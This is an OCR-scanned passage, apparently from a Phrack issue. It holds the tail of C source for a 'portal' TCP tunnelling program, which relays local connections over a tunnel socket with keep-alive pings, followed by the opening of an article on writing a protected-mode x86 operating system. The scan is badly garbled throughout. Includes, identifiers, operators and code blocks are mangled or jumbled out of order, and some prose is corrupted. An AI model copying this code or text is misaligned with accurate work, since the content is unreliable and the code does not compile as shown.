nclude <unistd.h> 
nclude <signal.h> 
nclude <errno.h> 
nclude "share.h" 


KOK KKK KK KK KK / 


Global data */ 


KOK KK OK KK KK / 


.h> 
-h> 


nclude <sys/time.h> 


extern char tunnel_buf [MAXLEN*2]; 
extern int tunnel_des; 
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extern int tunnel_src; 

extern int tunnel_size; 

extern struct connections connections; 

extern struct connection *descriptors [DESC_MAX]; 
extern int errno; 


extern int tunnel_port; /*tunnel port*/ 

extern int tunnel_sock; /*tunnel new accepted socket*/ 
char buf [MAXLEN*2]; 

char *remote_machine; /*remote machine name*/ 

int tunnel_basesock; /*tunnel base socket*/ 

int local_sock; /* local port socket*/ 

int local_port; /*local machine port*/ 

FILE *log=stdout; /*logfile = stdout by default*/ 

int ping_time=0; 


[ROR KK RK KKK KK KKK KK KK Usage KOK OK KK KK KK KK / 


void usage () { 


fprintf(stderr,"Usage: portal [-l logfile] <local_port> <tunnel_port>\n"); 
fprintf(stderr, "where:\n"); 
fprintf(stderr,"local_port is the port where we accept incoming" \ 
" connections\n"); 
fprintf(stderr,"remote_port is the port where we accept the tunnel" \ 
" to connect\n"); 
fprintf(stderr,"Coded by %s\n",AUTHOR) ; 


} 


[ROKK KKK KKK KK KK KK KKK Get the options KOK OK KK KK KK KK / 


extern int optind; 
extern char *optarg; 


void get_options(int argc,char *argv[]) { 
int c; 
while ((c=getopt (argc,argv, "1:")) !=-1) 
switch (c) { 
case 'l1’: 
if (! (log=fopen(optarg, "w"))) { 


log=stdout; 
fprintf(log,"Unable to open logfile '’%s’:%s\n", 
optarg, strerror(errno)); 
} 
break; 
Case Pes 
default: 
usage (); 
exit (-1); 
} 
/* the two next options*/ 
if (argc-optind!=2) { 
printf("Wrong number of options!\n"); 
usage (); 
exit (-1); 
} 
local_port=atoi(argv[optind++]); 
tunnel_port=atoi (argv[optind++])j; 
if (Local_port<1||local_port>65535]| |tunnel_port<1]||tunnel_port>65535) { 
printf("Ports below 1 and above 65535 dont give any sense\n"); 
usage (); 
exit (-1); 


mu 


} 


[BORK KR KKK KK RR I I RK I / 
[RK KKK KKK KK KK KKK Portal KOK KK KK KK OK KK / 
[ORK RR KKK KK KR RR I RK OK RK / 
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void open_local_port () { 
/*Open the local port for incoming connections*/ 
struct sockaddr_in ser; 


} 


int opt=1; 


local_sock=socket (AF_INET, SOCK_STREAM, 0) ; 


if (local_sock==-1) {fprintf(log,"Error opening socket\n");exit (0); } 
if (setsockopt (local_sock, SOL_SOCKET, SO_REUSEADDR, 

(char *) &opt, sizeof (opt) ) <0) 

{perror("setsockopt REUSEADDR") ;exit (1); } 


N 


ERO((char *) 


&ser, sizeof (ser)); 


ser.sin_family = AF_INET; 
ser.sin_addr.s_addr = htonl(INADDR_ANY); 
ser.sin_port = htons(local_port); 
if (bind(local_sock, (struct sockaddr *)&ser,sizeof(ser)) ==-1 )f{ 
fprintf(log,"Error binding to local port %d : %s\n" 
,local_port,strerror(errno)); 
exit (-1); 
} 
if (listen (local_sock,5)==-1) { 
fprintf(log,"Error listening to local port %d os" 
,local_port,strerror(errno)); 
exit(-1); 


} 


1’ 


fprintf(log,"Opened local port %d on socket %d\n",local_port,local_sock) ; 


void open_portal () { 


} 


int opt=0; 


struct sockaddr_in ser; 
if ((tunnel_basesock=socket (AF_INET, SOCK_STREAM, 0) )==-1) 


{perror ("socket") ;exit (-1); } 


if (setsockopt (tunnel_basesock, SOL_SOCKET, SO_REUSEADDR, 
(char *) &opt, sizeof (opt) ) <0) 
{perror("setsockopt REUSEADDR") ;exit (-1);} 


N 


ERO((char *) 


ser.sin_family 


ser.sin_addr.s_addr = 


ser.sin_port 


&ser,sizeof(ser)); 


= AF_INET; 


htonl (INADDR_ANY) ; 


= htons(tunnel_port); 


if (bind(tunnel_basesock, (struct sockaddr *)&ser,sizeof(ser)) ==-1 )f 
fprintf(log,"Error binding to tunnel port %d : %s\n" 
,tunnel_port,strerror(errno)); 
exit (-1); 
} 
if (listen (tunnel_basesock,5)==-1) { 
fprintf(log,"Error listening to tunnel port %d os" 
,tunnel_port,strerror(errno)); 
exit (-1); 


1’ 


int accept_portal () { 
struct hostent *from; 
struct sockaddr_in cl 
int newsock,clilen; 

clilen=sizeof (cli); 

if (!tunnel_basesock) 
/*Accept incoming cal 


li; 


return(-1);} 
1ls*/ 


newsock=accept (tunnel 
/*We want to know 


l1_basesock, (struct sockaddr *)&cli,&clilen); 


know our remote host better*/ 


from=gethostbyaddr((char *) (&cli.sin_addr),sizeof(cli.sin_addr),PF_IN 


if (!from) { 


close (newsock); 


return (- 


} 


1); 


fprintf(log,"Tunnel connection from:%s %d\n",from->h_name,cli.sin_port) ; 
return (newsock) ; 
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void close_portal () { 
shutdown (tunnel_sock,1); 
close (tunnel_sock); 


} 


struct connection *receive_local () { 
struct sockaddr_in cli; 
int newsock,clilen; 
struct hostent *from; 
struct connection *con; 
clilen=sizeof (cli); 
/*Accept incoming calls*/ 
newsock=accept (local_sock, (struct sockaddr *)&cli,&clilen); 
if (newsock==-1) 
{fprintf(log,"Server Accept Error:%s\n",strerror (errno) );exit (-1);} 
/*We want to know know our remote host better*/ 
from=gethostbyaddr((char *) (&écli.sin_addr),sizeof(cli.sin_addr), PF_INET); 
fprintf(log,"New connection from:%s %d\n",from->h_name,cli.sin_port); 
/*Add our new friend to our list of connections*/ 
connections.numtt+; 
con=(struct connection *)malloc(sizeof (struct connection) ); 
con->host=strdup (from—->h_name) ; 
con->port=cli.sin_port; 
con->local_sock=newsock; 
con->remote_sock=0; 
con->time=time (NULL) ; 
con->next=connections.head; 
connections.head=con; 
descriptors [newsock]=con; 
return(con); 


void alive() { 

/* Tf we don’t get a ping from the tunnel 
every ALIVE_TIME*2 we disconnect the connection to the 
tunnel, and wait for a new. If the tunnel has not died, all 
the connections from the tunnel will continue as normal once 
the connection has been established again*/ 

if (time (NULL) -ping_time>ALIVE_TIME*2) 
printf ("Connection to tunnel probably lost, hanging up.\n"); 
shutdown (tunnel_sock, 2) ; 
close (tunnel_sock) ; 
tunnel_sock=-1; 


} 


int reset_selector(fd_set *selector,fd_set *errsel, struct connection *con) { 
/* We tell the selector to look on the tunnel socket aswell 
as our live connections, and the connection socket.*/ 
int maxsock,i; 
FD_ZERO(selector) ; 
FD_SET (local_sock, selector); 
FD_SET (tunnel_sock, selector); 
FD_SET (local_sock,errsel); 
FD_SET(tunnel_sock,errsel); 
con=connections.head; 
maxsock=max (local_sock,tunnel_sock) ; 
for (1=0; i<connections.num; i++, con=con->next) { 
FD_SET (con->local_sock, selector) ; 
FD_SET (con->local_sock,errsel); 
maxsock=max (maxsock, con->local_sock); 
} 


return (maxsock) ; 


| i ba 


a 
ry 
wy 
ry 


} 


void check_tunnel_connection(fd_set *selector,fd_set *errsel, struct connection *con) { 
/*Here we check the tunnel for incoming data*/ 
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if (FD_ISSET (tunnel_sock,errsel) ) { 
fprintf(log,"Tunnel connection terminated! \n"); 
shutdown (tunnel_sock, 2); 
close (tunnel_sock); 
tunnel_sock=-1; 
return; 
} 
if (FD_ISSET(tunnel_sock, selector) ) { 
if (receive_tunnel () !=-1) { 
if (tunnel_src==0é&tunnel_des==0) { /*We got a Myping*/ 
ping_time=time (NULL) ; 
/* Ping the tunnel back!*/ 
transmit_tunnel (buf,0,0,0); /*Send a Myping back*/ 


GJ 


} 
else if (tunnel_des) { 
if (descriptors [tunnel_des]) { 
con=descriptors[tunnel_des]; 
if (tunnel_src!=0) { 
con->remote_sock=tunnel_src; 
writen (descriptors [tunnel_des]->local_sock,tunnel_buf,tunnel_size) ; 
} 
else{ 
printf ("Hangup signal received. Removing connection to %s %d\n",con->host,con-> 


port); 
removeconnection(con); 


} 


void check_connection_port(fd_set *selector,fd_set *errsel,struct connection *con) { 
/*Here we check the connection port for new connections*/ 
if (FD_ISSET(local_sock, selector) ) { 


con=receive_local(); 

if (con) { 
printf ("Transmitting the new connection\n"); 
*( (int *) (&ébuf[4]))=htonl(con->port) ; 


strncpy (&buf [8],con->host,MAX_HOSTNAME_SIZE) ; 
* (&buf[8]+strlen(con->host) )=0; 
transmit_tunnel (buf, 4+min (strlen (con->host)+1,MAX_ HOSTNAME SIZE) ,con->local_sock, 0); 


} 


void main(int argc,char **argv) { 
get_options (argc,argv) ; 
init_descriptors(); 
connections.num=0; 
connections.head=NULL; 
remote_machine=get_ip(argv[2]); 
fprintf(log,"Tunneling incoming calls on port %d to port %d \n" 
,local_port,tunnel_port); 
connections.num=0; 
connections .head=NULL; 
fprintf(log,"Opening portal\n"); 
open_portal(); 
signal (SIGINT, ctrl1C); 
fprintf(log,"Opening localport\n"); 
open_local_port(); 
while (1) 
fprintf(log,"Waiting for tunnel connection on port %d\n",tunnel_port) ; 
while ((tunnel_sock=accept_portal())==-1) sleep(4); 
ping_time=time (NULL) ; 
while (tunnel_sock!=-1) { 
fd_set selector,errsel; 
struct connection *con=NULL; 
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alive_time; 


.tv_sec=ALIV 


E TIME; 


live_time.tv_usec=0; 
live(); 


/* We have to listen to the tunnel, the local port, and alle the 
current connections. */ 

if (select (reset_selector (&selector, &errsel,con) +1, 
&selector,NULL, &errsel, &alive_time) ) { 


} 
} 


check_tunnel 


sleep (2); 


nclud 
nclud 
nclud 
nclud 
nclud 
nclud 
nclud 
nclud 
nclud 
nclud 


nclud 


e 
e 
e 
€ 
e 
e 
e 
€ 
e 
€ 


e 


tunnel/share.c 
nclude 
nclude 
nclude 


<stdio.h> 
<stdlib.h> 
<unistd.h> 
<netinet/in.h> 
<arpa/inet.h> 
<sys/socket.h> 
<sys/time.h> 
<sys/utsname.h> 
<fcntl.h> 
<string.h> 
<signal.h> 
<errno.h> 
<netdb.h> 


"Share.h" 


char tunnel_buf [MAXLEN*2] 


int tunne 
int tunne 
int tunnel 
int tunne 
int tunne 


extern 


l_des; 
als ael 
=Size; 
l_sock; 
l_port; 


FILE *log; 


1, 


1 connection(&selector, &éerrsel,con); 
check_connection_port (&selector, &errsel,con) ; 
check_local_connections (&éselector, &éerrsel,con); 


/*Buffer to store the tunnel data in*/ 
/*Destination socket */ 

/*Source socket*/ 

/*Size of the data currently in the buffer*/ 
/*The socket of the portal*/ 

/*The port we wan’t to run on*/ 


/* Our log file*/ 


extern int errno; 
struct connection *descriptors [DESC_MAX]; 
struct connections connections; /*A linked list of our connections*/ 
/* 
Packet header: 
Hat at at a HE aE aE aE HE aE aE HE aE aE aE aE aE aE aE aE EE aE Ea aE EE aE / 
Dest Source Data size / data comes here 
Heat Ht at at at aE aE aE aE aE aE aE aE HE HE aE aE aE aE HE aE aE HE aE aE EE aE EEA 
l byte 1 byte 2 bytes 
If the sestination field is zero, we are initiating a new connection 
If the source field we are dropping a connection 
If both the destination and the source is zero, it is a Myping packet. 
*/ 


void ctrilC(int sig) 


{ 


fprintf(log,"Shutting down the hard way\n"); 
shutdown (tunnel_sock, 2); 
close (tunnel_sock); 

exit (-1); 
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char *get_ip(char *host) { 
struct hostent *remote; 
struct in_addr *in; 
remote=gethostbyname (host) ; 
if (remote==NULL) { 


fprintf(log,"Hostinformation of remote machine ’%s’ 


" reason:%s",host,strerror(errno) ); 


exit (-1); 


} 


in=(struct in_addr *) remote->h_addr_list[0]; 
return (strdup (inet_ntoa(*in))); 


} 


int transmit_tunnel(c 


int nleft=sizet+4,nwritten; 


fd_set selector,errsel; 


not resolved, 


har *data,int size,int source,int destination) { 


data[0]=(unsigned char)destination; /*Destination into header*/ 
data[1l]=(unsigned char) source; /*Source into header*/ 
*((u_short *)&data[2])=htons(size); /*Size into header*/ 
while (nleft>0) 

FD_ZERO(&errsel); 


FD_Z 
FD_SI 
FD_S! 


RO(&selector) ; 
rT (tunnel_sock, &errsel); 
[(tunnel_sock,&selector); 


= 


GF] FIFI FI Sp 


7 


select (tunnel_sock+1,NULL, &selector, &éerrsel, NULL) ; 
if (FD_ISSET(tunnel_sock, &éerrsel) ) { 
printf("Big bug\n"); 


} 


nwritten=write (tunnel_sock,data,nleft); 
if (nwritten==-1) { 


fprintf (log, "! 


tunnel_sock=-1; 
return (nwritten); 


} 


else if (nwritten==0) { 


fprintf (log, "I 


return (nwritten); 


} 


nleft-=nwritten; 
datat=nwritten; 


} 


return(size - nleft); 


} 


int receive_tunnel () { 
static int received=0; 
int n, left, got=0,quit=0,sofar=0; 
receivedt+; 


while 


(sofar<4) { 


quit=0; 

while (!quit) { 
n=read(tunnel_sock, &tunnel_buf [sofar],4-sofar) ; 
if (n>0) {quit=1; sofart+=n; } 
if (n<1) { 


} 
} 


tunnel 


tunnel 


fprintf(log,"Connection terminated! \n") ; 
shutdown (tunnel_sock, 2); 

close (tunnel_sock); 

tunnel_sock=-1; 

return(-l1); 


_src=tunnel_buf[1]; /*Fetch the source*/ 
| size=ntohs(*((u_short *) &tunnel_buf[2])); 


left=tunnel_size; 


while 


(lettt=0)-{ 


| des=tunnel_buf[0]; /*Fetch the destination*/ 
tunnel 


/*Fetch the 


Error writing to tunnel:%s\n",strerror(errno) ); 


Error: Wrote zero bytes in transmit_tunnel\n"); 


size*/ 
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n=read(tunnel_sock, &tunnel_buf[got],left); 
if (n<0O) { 
fprintf(log,"Connection terminated in receive_tunnel!\n"); 
shutdown (tunnel_sock, 2); 
close (tunnel_sock) ; 
tunnel_sock=-1; 
return(-l1); 
} 
gott=n; 
left-=n; 
} 
return(n); 
} 
void check_local_connections(fd_set *selector,fd_set *errsel, struct connection *con) { 
/*Here we check each of the local connections for incoming date*/ 
char buf [MAXLEN*2]; 
Ln AL ny 
con=connections.head; 
for (1=0; i<connections.num&&con; i++, con=con->next) { 
if (FD_ISSET (con->local_sock,errsel) ) { 
fprintf(log,"LLocal connection terminated\n") ; 
fprintf(log,"Removing connection to %s %d\n",con->host,con->port) ; 
if (con->remote_sock) transmit_tunnel (buf,0,0,con->remote_sock) ; 
removeconnection(con); 
break; 


} 
if (FD_ISSET (con->local_sock, selector) &&con->remote_sock) { 
n=read(con->local_sock, &buf [4] ,MAXLEN) ; 
if (n<1) { 
fprintf(log,"Local connection terminated\n") ; 
fprintf(log,"Removing connection to %s %d\n",con->host,con->port) ; 
transmit_tunnel (buf,0,0,con->remote_sock) ; 
removeconnection(con); 
break; 
} 
/*forward the data to the tunnel*/ 
transmit_tunnel (buf,n, con->local_sock, con->remote_sock) ; 


} 


void ZERO(char * buf,int size) {int i=0;while(i<size) buf [i++]=0; } 


int writen(int fd, char *ptr, int nbytes) 
{ 
int nleft=nbytes,nwritten; 
while (nleft>0) { 
nwritten=write(fd,ptr,nleft); 
if (nwritten<=0) return(nwritten); 
nleft-=nwritten; 
ptrt=nwritten; 
} 


return(nbytes —- nleft); 


} 


int remote_connect (char *machine,int port) 
{ 

int sock; 

struct sockaddr_in ser; 

ZERO((char *) &ser,sizeof(ser)); 


ser.sin_family = AF_INET; 

ser.sin_addr.s_addr = inet_addr (machine) ; 

ser.sin_port = htons (port); 

sock=socket (AF_INET, SOCK_STREAM, 0) ; 

if (sock==-1) {perror ("Error opening socket\n");return(-1);} 

if (connect (sock, (struct sockaddr *) &ser,sizeof (ser) )==—-1) { 
fprintf(log,"Can’t connect to server:%s\n",strerror(errno) ); 


return(-1); 
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} 


return(sock) ; 


} 


void disconnect (struct connection *con,int sockl,int sock2) { 


fprintf(log,"Closing link to: 


shutdown (sock1,2); 
shutdown (sock2,2); 


Cc 
Cc 
Cc 


} 


lose (sockl); 
lose (sock2) ; 
lose (con->local_sock) ; 


void init_descriptors() { 
int i; 
for (i=0; i<DESC_MAX; i++) { 


} 
} 


descriptors [i]=NULL; 


void removeconnection(struct connection *con) { 
struct connection *c2,*c=connections.head; 
if (c==con) { 


} 


connections.head=c-—>next; 
descriptors [c->local_sock]=NULL; 
free (c->host); 

shutdown (c->local_sock, 2); 

close (c->local_sock); 

free(c); 

connections.num--; 

return; 


C2=Cc; 
c=c->next; 
while(c) { 


} 


if (c==con) { 
/* connections.head=c2; */ 
c2-—>next=c->next; 
descriptors [c->local_sock]=NULL; 
free(c->host); 
shutdown (c->local_sock,2); 
close (c->local_sock); 
free(c); 
connections.num-—-; 
return; 

} 

C2=C; 

c=c->next; 


<--> 
<++> tunnel/share.h 
[ROKK KR KKK KKK KK OK KK / 


/* Structs & Defines */ 
[RRR KKK KKK KK KK OK KK / 


de 
de 
de 


de 
#de 
de 


def 


$3 %da\n",con->host,con->port) ; 


reconnect to portal*/ 


def 


fine MAX HOSTNAME SIZE 128 
fine MAXLEN 32768 /*Maximum length of our data*/ 
fine ALIVE_TIME 60 /*Time to wait before sending a Myping*/ 
fine DESC_MAX 128 /*Maximum number of descriptors used*/ 
fine RETRY_TIME 60 /* Time to wait before w 
fine max(a,b) ((a>b) ?a:b) 
fine min(a,b) ((a<b) ?a:b) 
fine AUTHOR "bishnu@hotmail.com" 
struct connections { 


int num; 
struct connection *head; 


}; 
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struct connection { 
struct connection *next; 
int port; 
int local_sock; 
int remote_sock; 
time_t time; 
char *host; 
}; 


char *get_ip(char *host); 


oid random_delay(int n); 

nt transmit_tunnel (char *data,int size,int source,int destination); 
nt receive_tunnel (); 

oid hostname(char *name) ; 

oid ZERO(char * buf,int size); 

nt writen(int fd, char *ptr, int nbytes); 

void ctrlC(int sig); 

void sleep_usec(int n); 

void nonblock(int s); 

int remote_connect (char *machine,int port); 

void disconnect (struct connection *con,int sockl,int sock2); 

void init_descriptors(); 

int max_descriptor(); 

void removeconnection(struct connection *con); 

void check_local_connections(fd_set *selector,fd_set *errsel, struct connection *con); 
<--> 


Begg kee < 


----[ EOF 
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[ Protected mode programming and O/S development 


Bake SSS [ Mythrandir <jwthomp@cu-online.com> 


----[ Forward 


About two months ago I decided to begin learning about developing an operating 
system from the ground up. I have been involved in trusted operating systems 
development for over two years now but have always done my work with 
pre-existing operating systems. Mucking with this driver model, deciphering 
that streams implementation, loving this, hating that. I decided it was time 
to begin fresh and start really thinking about how to approach the design 

of one, so that I would be happy with every part. At least if I wasn’t, I 
would only be calling myself names. 


This article is the first tentative step in my development of an operating 
system. What is here is not really much of a kernel yet. The big focus of 
this article will be getting a system up and running in protected mode with a 
very minimal kernel. I stress minimal. I have been asked repeatedly what my 
design goals for this operating system are. The fact is the operating system 
itself was the goal for this part. There was simply to much that I didn’t 
know about this stage of the development to go on designing something. It 
would be like asking a kindergarten fingerpainter what her final masterpiece 
was going to look like. 


However, now that I have this phase reasonably done, it is time to begin 
thinking about such issues as: a security subsystem, a driver subsystem, as 
well as developing a real task manager and a real memory manager. Hopefully, 
by the next phrack I will be able to not only answer what I want for these 
topics but have also implemented many of them. This will leave me with a much 
more solid kernel that can be built upon. 


So, why write this article? There are several reasons. First, writing down 
what you have done always help solidify your thoughts and understanding. 
Second, having to write an article imposes a deadline on me which forces me to 
get the job done. Finally, and most importantly I hope to give out enough 
k 
W 


nowledge that others who are interested in the subject can begin to do some 
erk AnGLe. 


One comment on the name. JeffOS is not going to be the final name for this OS. 
In fact several names have been suggested. However, I have no idea yet what I 
want to call it, mostly because it just isn’t solidified enough for a name. 
When its all said and done, I do hope I can come up with something better than 
JeffOS. For now, getting a real working kernel is more important than a real 
working name. 


I hope that you find the following information interesting, and worth 
investigating further. 


Cheers, 
Jeff Thompson 
AKA Mythrandir 


PS: Some words on the Cryptography article. First a thank you for all of the 
letters that I received on the article. I am happy to find that many people 
found the article interesting. For several people it rekindled an old interest 
which is always great to hear. However, for several people I have unfortunate 
news as well. The next article in the series will have to be postponed for 

a few issues until I complete this operating system. As is with many people, 
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I have been caught by a new bug (The OS bug) and have set myself up to be 
committed to the work for some time. I am of course still interested in 
discussing the topic with others and look forward to more email on the subject. 


The winners of the decryption contest were: 


lst message: 
lst) Chaos at chaos@vector.nevtron.si 
2nd) Oxygen at oxygen@james.kalifornia.com 


Solution: 
The baron’s army will attack at dawn. Ready the Templar knights and strike his 
castle while we hold him. 


2nd message: 

lst) Chaos 

Solution: 

MULTICAST PROTOCOLS HAVE BEEN DEVELOPED TO SUPPORT GROUP COMMUNICATIONS 


THESE PROTOCOLS USE A ONE TO MANY PARADIGM FOR TRANSMISSION TYPICALLY 
USING CLASS D INTERNET PROTOCOL ADDRESSES TO SPECIFY SPECIFIC MULTICAST GROUPS 


Also, there is one typo in my article. The book which was written without the 
letter ’e’ was not The Great Gatsby, but rather Gadsby. Thanks to Andy 
Magnusson for pointing that out. 


Great job guys! 


----[ Acknowledgements 


I owe a certain debt to two people who have been available to me during my 
development work. Both have done quite a bit of work developing their own 
protected mode operating systems. I would like to thank Paul Swanson of the 
ACM@UIUC chapter for helping solve several bugs and for giving me general tips 
on issues I encountered. I would also like to thank Brian Swetland of 
Neoglyphics for giving me a glimpse of his operating system. He was also nice 
enough to allow me to steal some of his source code for my use. This source 
include the console io routines which saved me a great deal of time. Also, 
the 1386 functions were given to me by Paul Swanson which has made a lot of 
the common protected mode instructions easily useable. 


Following new releases and information on this operating systems work, I am 
currently redoing my web site and will have it up by Feb 1, 1998. I will be 
including this entire article on that site along with all updates to the 
operating system as I work on it. One of the first things that I will be 
doing is rewriting all of the kernel. A large part of what is contained 
within these pages was a learning experience. Unfortunately, one consequenc 
of trying to get this thing done was it becoming fairly messy and hackish. I 


would like to clean it up and begin to build upon it. Having a good code base 
will be invaluable to this. So please watch for the next, and future releases 
of this code and feel free to contact me with any feedback or questions. I 

will do my best to help. I won’t be able to answer every question but I will 


certainly try. Also, please be patient as I have a very busy schedule outside 
of this project and am often times caught up by it. 


I can be reached at: 
jJwthomp@cu-online.com 
and my web site is at: 
http://www.cu-online.com/~jwthomp/ (Up Feb 1, 1998) 


----[ Introduction 
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Throughout this document I assume a certain level of knowledge on the part of 
the reader. This knowledge includes c and assembly language programming, and 
x86 architecture. 


The development requirements for the GuildOS operating system are: 


An ELF compiler 
I used the gnu ELF compiler which comes with linux. It is possible to use 
other ELF cross compilers on other systems as well. 


a386 assembler 
This can be obtained from: 


Eric Isaacson 

416 E. University Ave. 
Bloomington IN 47401-4739 
71333.3154@compuserve.com 


or call 1-812-335-1611 
A86+D86+A386+D386 is $80 
Printed manual $10 


This is a really nice assembler. Buy a copy. I did. 


It is also possible to convert the boot loader assembly code to another 
assembler. 


A 486+ machine 
You must have a machine to test the OS on. 


Great books to read to gain an understanding of the various topics presented 
in the following pages are: 


Protected Mode Software Architecture by Tom Shanley from MindShare, Inc. 
ISBN 0-201-55447-X $29.95 US 


This book covers the protected mode architecture of the x86. It also explains 
the differences between real mode and protected mode programming. This book 
contains much of the information which is in the Intel Operating Systems 
Developers guide, but also explains things much more in depth. 


Developing Your Own 32-Bit Operating System by Richard A. Burgess from SAMS 
Publishing. ISBN 0-672-30655-7 


This book covers the development of a complete 32-bit OS. The author also 
creates his own 32-bit assembler and compiler. Considerable portions of the 
code are written in asm, but there is still quite a bit inC. 


Th ntire Intel architecture series and their OS developers guides which are 
available from their web site for free. 


---7 Chapter 1 - Booting into protected mode 


The first step in setting up an operating system on the x86 architecture is to 
switch the machine into protected mode. Protected mode allows you to use 
hardware protection schemes to provide operating system level security. 

The first component which I began working on was the first stage boot loader 
which is located in "Jeff0OS/loader/first/". 

The first stage boot loader is placed on the first sector of the floppy. Each 
sector is 512 bytes. This is not a lot of room to write all of the code 
required to boot into protected mode the way I would like to so I had to break 
the boot loader into two parts. Thus the first and second stage floppy loader. 
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After the Power On Self-Test (POST) test this first sector is loaded up into 
memory location 0000:7C00. I designed the first stage of the floppy boot 
loader to load up all of the files into memory to be executed. The first 
instruction in the boot loader jumps to the boot code. However, between th 
jump and the boot code are some data structures. 


The first section is the disk parameters. I’m not currently using any of this 
information but will in future versions. The next set of structures contain 
information on the other data files on the floppy disk. Each structure looks 
like this in assembly: 


APCX DW 0000h ; Specifies CX value for INT 13h BIOS routine 
APDX DW 0000h ; DX 

APES DW 0000h : ES 

APBX DW 0000h " BX 

APSZ DB Oh ; Specifies number of sectors to read in 
APSZ2 DB Oh ; Unused 


There are four copies of this structure (APxx, BPxx, CPxx, DPxx). 


he INT 13h BIOS call has the following arguments: 


ch: Cylinder number to start reading from. 

cl: Sector number to start at. 

dh: Head number of drive to read from (00h or Olh for 1.44M floppy disk drives) 
dl: Drive number (00h for Disk A) 

es: Segment to store the read in sectors at. 

bx: Offset into the segment to read the sectors into. 

ah: Number of sectors to read in. 

al: Function number for INT 13h. (02h is to read in from the disk) 


I use the APxx to load the second stage boot loader. BPxx is being used 
to load the first stage kernel loader. CPxx is used to load a simple user 
program. Finally, DPxx is used to load the kernel in. 


Following the loader structures are two unused bytes which are used to store 


ae 


temporary data. SIZE is used but SIZE2 is not currently used. 


The boot code follows these structures. This boot code relocates itself into 
another section of memory (9000:0000 or 90000h linear). Once relocated, it 
loads all of the files into memory and then jumps into the beginning of the 
second stage boot loader. 


The first part of the second stage boot loader contains a macro which is used 
to easily define a Global Descriptor Table (GDT) entry. In protected mode th 
GDT is used to store information on selectors. A selector in protected mode 
is referred to by a number stored in any of the segment registers. A selector 
has the following format: 


Bits Use 

Loe 3 Descriptor Table Index 

2 Table Indicator 

I tO The Requestor Privilege Level 


The Descriptor Table Index or (DT) is an index into the GDT. The first entry 
in the GDT is 00h, the second is 08h, then 10h, etc.. The reason that the 
entries progress in this manner is because the 3 least significant bits are 
used for other information. So to find the index into the GDT you doa 
segment & Oxfff8 (DT = Selector & Oxfff8). 


The Table Indicator selects whether you are using a GDT or a Local Descriptor 
Table (LDT). I have not yet had a reason to use LDT’s so I will leave this 
information to your own research for now. 


Finally, the Requestor Privilege Level is used to tell the processor what 
level of access you would like to have to the selector. 
0 = 0S 
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1 = 0S (but less privileged than 0) 
2 OS (but less privileged than 1) 
3 = User level 


[Typically levels 0 and 3 are the only ones used in modern operating systems. 


he GDT entries which describe various types of segments have the following 
form: 


63: =--56 Upper Byte of Base Address 
55 Granularity Bit 

54 Default Bit 

53 0 

52 Available for Use (free bit) 
Dh 48 Upper Digit of Limit 

47 Segment Present Bit 

46 -— 45 Descriptor Privilege Level 
44 System Bit 

43 Data/Code Bit 

42 Conforming Bit 

41 Readable bit 

40 Accessed bit 

39 - 32 Third Byte of Base Address 
31 - 24 Second Byte of Base Address 
Zor" 1G First Byte of Base Address 
15.8 Second Byte of Limit 

D200 First Byte of Limit 


The base address is the starting location of the segment descriptor (for code 
or data segments). The limit is the number of bytes or 4k pages. Whether it 
is bytes or 4k pages depends on the setting of the granularity but. If the 
granularity bit is set to 0 then the limit specifies the length in bytes. If 
it is set to 1 then the limit specifies the length of the segment in 4k pages. 


The default bit specifies whether the code segment is 32bit or 16bit. If it is 
set to 0 then it is 16bit. If it is set to 1 then it is 32bit. 

The present bit is set to one if the segment is currently in memory. This is 
used for virtual paging. 


[The descriptor privilege level is similar to the RPL. The DPL simply states at 
what protection level the segment exists at. The values are the same as for 
the RPL. 


he system bit is used to specify whether the segment contains a system segment. 
It is set to 0 if it is a system(OS) segment. 


he data/code bit is used to specify whether the segment is to be used as a 
code segment or as a data segment. A code segment is used to execute cod 

from and is not writable. A data segment is used for stacks and program 

data. It’s format is slightly different from the code segment depicted above. 


The readable bit is used to specify whether information can be read from the 
segment or whether it is execute only. 


The next part of the second stage floppy boot loader contains the code which 
is used to enable the A20 address line. This address line allows you to 
access beyond the 1MB limit that was imposed on normal DOS real mode 
operation. For a discussion of this address line I recommend looking at the 
Intel architecture books. 


Onc nabled the GDT that exists as data at the end of the assembly file is 
loaded into the GDT register. This must be done before the switch into 
protected mode. Other wise any memory accesses will not have a valid selector 
described for them and will cause a fault (I learned this from experience). 


Once this is completed the move is made to protected mode by setting the 
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protected mode bit in the CRO register to 1. 
Following the code which enables protected mode, there is data which represents 


a far call into the next portion of the second stage boot loader. This causes 
a new selector to be used for CS as opposed to an undefined one. 


he code that is jumped into simply sets up the various selectors for the data 
segments. 


There is then some simple debugging code which prints to the screen. This was 
used for myself and can be removed. 


he stack segment is then set up along with the stack pointer. I placed the 
stack at 90000h. 


Finally I push the value for the stack onto the stack (to be retrieved by the 
kernel) and then call linear address 100080h which contains the first stage 
loader for the kernel. 


----[ Chapter 2 - The first stage kernel boot loader 


The first stage kernel boot loader is located in \boot. 


First some notes on what is happening with the first stage boot loader. The 
boot loader is compiled to ELF at a set TEXT address so that I can jump into 
the code and have it execute for me. In the makefile I specify the text 


address to be 10080. The first 80h bytes are used as the ELF header. I 
completely ignore this information and jump directly into linear memory 

address 10080h. It is my understanding that newer versions of the ELF compiler 
have a slightly different header length and may cause this number to need to be 
modified. This can be determined by using a dissasembler (i.e. DEBUG in DOS) 
to determine where the text segment is beginning. 


The two files of importance to the boot loader are main.c and mem.c. 


main.c contains the function ‘void _start (unsigned long blh);*. This function 
must be the first function linked in. So main.c must be the first file which 
is linked and _start() must be the first function in it. This guarantees that 
start will be at 10080h. The parameter blh is the value which was pushed in 
by the second stage boot loader. This originally had meaning, but no longer 
does. 


The first thing that _start does is to call kinit_MemMgmt which is the 
initialization routine for memory. 


he first thing that kinit_MemMgmt does is set nMemMax to Oxfffff. This is 
he maximum number of bytes on the system. This value is 1MB. kinit_MemMgmt 
hen calls kmemcount which attempts to calculate the amount of free memory on 
he system. Currently this routine does not work properly and assumes that 
here is 2MB of free memory on the system. This is sufficient for now but 
needs to be fixed in the future. 


t 
t 
t 
t 


kinit_MemMgmt then calls kinit_page which sets of the page tables for the 
kernel. 


Paging is the mechanism used to define what memory a task is able to access. 
This is done by creating a "virtual" memory space which the task accesses. 
Whenever an access to memory occurs the processor looks into the page tables 
to determine what "real" physical memory is pointed to by this memory location. 
For example, the kernel could designate that each task will get 32k (8 pages) 
of memory to use for the stack. Without using paged memory each of these 
memory locations would occur at a different address. However, by using paging 
you can map each of these physical memory allocations to a paged address 

which allows each of these allocations to appear to occur at the same location. 


The page tables are broken up in the following manner. First is the page 
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directory. It is composed of 1024 entries which have the following properties: 
